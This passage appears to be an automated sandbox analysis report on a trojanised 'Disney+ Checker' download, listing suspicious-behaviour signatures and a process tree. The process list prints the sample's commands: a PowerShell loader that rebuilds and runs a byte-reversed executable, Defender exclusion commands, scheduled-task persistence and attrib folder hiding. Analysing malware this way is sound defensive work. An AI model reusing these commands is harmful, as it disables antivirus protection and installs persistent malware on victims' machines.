| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/NGsQfm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f8b946f8,0x7ff8f8b94708,0x7ff8f8b94718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5280 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe
"C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName Microsoft.VisualBasic [String] $Config_Path = 'C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1' + '\config\config' [String] $Tool_Path = 'C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1' + '\config\config\Rev.exe' try { if ([System.IO.File]::Exists($Config_Path + '\A1.exe') -eq $true) { [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } [String[]] $PSCommands = @('@shift /0', '@echo off', '@setlocal enableextensions', '@cd /d "%~dp0"', 'config\Config.bat') [System.Diagnostics.Process] $Proc = New-Object System.Diagnostics.Process [System.Diagnostics.ProcessStartInfo] $StartInfo = New-Object System.Diagnostics.ProcessStartInfo $StartInfo.FileName = 'cmd.exe' $StartInfo.RedirectStandardInput = $true $StartInfo.UseShellExecute = $false $StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden $StartInfo.CreateNoWindow = $true $Proc.StartInfo = $StartInfo $Proc.Start() [System.IO.StreamWriter] $SW = $Proc.StandardInput if ($SW.BaseStream.CanWrite -eq $true) { $SW.WriteLine($PSCommands[0]) $SW.WriteLine($PSCommands[1]) $SW.WriteLine($PSCommands[2]) $SW.WriteLine($PSCommands[3]) $SW.WriteLine($PSCommands[4]) } [System.Threading.Thread]::Sleep(3000) if ([System.IO.File]::Exists($Tool_Path) -eq $true) { [Byte[]] $Rev_Bytes = [System.IO.File]::ReadAllBytes($Tool_Path) [Array]::Reverse($Rev_Bytes) [System.IO.FileStream] $FS = [System.IO.File]::Create($Config_Path + '\A1.exe') $FS.Write($Rev_Bytes, 0, $Rev_Bytes.Length) $FS.Close() $FS.Dispose() [System.IO.File]::Delete($Tool_Path) [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } } catch { }
C:\Windows\SysWOW64\cmd.exe
"cmd.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -force
C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe
"C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Microsoft\BackEndUpdates\HostDriversUpdates" /tr "C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe" /RL HIGHEST /f
C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\BackEndUpdates
C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\System\FontDriverHost.exe
FontDriverHost.exe -pZFr2PH3k
C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe
C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3c8 0x474
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/SDqxsud
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f8b946f8,0x7ff8f8b94708,0x7ff8f8b94718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3152 /prefetch:2
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3c8 0x474
Network
Files